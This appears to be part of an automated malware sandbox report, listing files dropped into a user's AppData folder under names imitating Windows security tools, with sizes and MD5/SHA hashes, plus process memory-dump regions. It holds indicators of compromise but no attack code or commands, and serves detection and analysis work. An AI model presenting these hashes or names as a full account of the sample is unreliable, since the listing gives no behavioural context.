    1e76fc77d50b65268097301c482f005e

    SHA1

    ee2e94c47fd73cc14b26ece4dcae61a5d38e2c94

    SHA256

    ac0cdd2e2d793cb81fe898e457f357aac93a69410369bf35b5a3c6ff3beb0f02

    SHA512

    e19187da74d592fd958ac7d7c05efc81fb79f0cd90e53efeb9324cd54ed572d4e72a7e79a22adee097341269e19c64a6ff46083c6bef115dbfd16c72cca1f771

  • C:\Users\Admin\AppData\Roaming\Windows Defender Security.exe

    Filesize

    267KB

    MD5

    86de666b0ad8dbc41cd8bde7edf2eaf1

    SHA1

    bd1739f2affb80835793ef2a7f1a0a4d92d57947

    SHA256

    606ddedb2de122911f04e14e584729f3b44852814c936f540ec00fde47ed4092

    SHA512

    c5259c56d0b4defe9af7be4f6ac4fea2d9052509041fac0a577f59ab362862079c8e39b27e3e04542b6255b6ef506138fded25fc09952524084e973e333a50a3

  • C:\Users\Admin\AppData\Roaming\Windows Security.exe

    Filesize

    107KB

    MD5

    e70a3009a59897bcceaf38d617eaa267

    SHA1

    fcd5f23e4f8ab3238e62a4c42327ee0634bbca72

    SHA256

    f23e22277e90ee4423c480a5d778bc3fe7daed8d906e252aaa46938fcd0566dd

    SHA512

    661e6a4b8059afe33c800ff98cff76012447952a3afa1c7e63763d019906116cc9f32d7201b56f7120e32ce6073895166157d5d122cb6f243c7e26d47f613173

  • C:\Users\Admin\AppData\Roaming\crack.exe

    Filesize

    8KB

    MD5

    9215015740c937980b6b53cee5087769

    SHA1

    a0bfe95486944f1548620d4de472c3758e95d36a

    SHA256

    a5390a297f14ef8f5be308009ec436d2a58598188dbb92d7299795a10ba1c541

    SHA512

    5b9bbf1836466d803d3e160a38e10c8397aa3966c120ab6435a52b7d0a09eb664ef2172bf0e7e2de1cc3eae261167c9355fa7ac3b1b7e4504a7e07b82c4b90e2

  • memory/232-75-0x0000000000310000-0x000000000035A000-memory.dmp

    Filesize

    296KB

  • memory/772-221-0x00000000723EE000-0x00000000723EF000-memory.dmp

    Filesize

    4KB

  • memory/772-31-0x00000000723EE000-0x00000000723EF000-memory.dmp

    Filesize

    4KB

  • memory/772-74-0x0000000007E80000-0x0000000007F8C000-memory.dmp

    Filesize

    1.0MB

  • memory/772-88-0x00000000058E0000-0x00000000058EA000-memory.dmp

    Filesize

    40KB

  • memory/772-46-0x0000000000E80000-0x0000000000FFE000-memory.dmp

    Filesize

    1.5MB

  • memory/1264-73-0x0000000005580000-0x0000000005B24000-memory.dmp

    Filesize

    5.6MB

  • memory/1264-70-0x0000000000770000-0x0000000000792000-memory.dmp

    Filesize

    136KB

  • memory/1264-76-0x0000000005080000-0x0000000005112000-memory.dmp

    Filesize

    584KB

  • memory/1264-77-0x0000000005120000-0x00000000051BC000-memory.dmp

    Filesize

    624KB

  • memory/1264-79-0x0000000004FA0000-0x0000000004FAA000-memory.dmp

    Filesize

    40KB

  • memory/1436-71-0x0000000000DD0000-0x0000000000DD8000-memory.dmp

    Filesize

    32KB

  • memory/2812-95-0x0000000005310000-0x0000000005376000-memory.dmp

    Filesize

    408KB

  • memory/2812-83-0x0000000000400000-0x0000000000432000-memory.dmp

    Filesize

    200KB

  • memory/2812-252-0x0000000005E70000-0x0000000005E7A000-memory.dmp

    Filesize

    40KB

  • memory/2848-72-0x0000000075210000-0x00000000757C1000-memory.dmp

    Filesize

    5.7MB

  • memory/2848-26-0x0000000075210000-0x00000000757C1000-memory.dmp

    Filesize

    5.7MB

  • memory/2848-29-0x0000000075210000-0x00000000757C1000-memory.dmp

    Filesize

    5.7MB

  • memory/2848-30-0x0000000075210000-0x00000000757C1000-memory.dmp

    Filesize

    5.7MB

  • memory/4468-0-0x0000000075212000-0x0000000075213000-memory.dmp

    Filesize

    4KB

  • memory/4468-28-0x0000000075210000-0x00000000757C1000-memory.dmp

    Filesize

    5.7MB

  • memory/4468-2-0x0000000075210000-0x00000000757C1000-memory.dmp

    Filesize

    5.7MB

  • memory/4468-1-0x0000000075210000-0x00000000757C1000-memory.dmp

    Filesize

    5.7MB

  • memory/4704-81-0x0000000000400000-0x000000000040A000-memory.dmp

    Filesize

    40KB
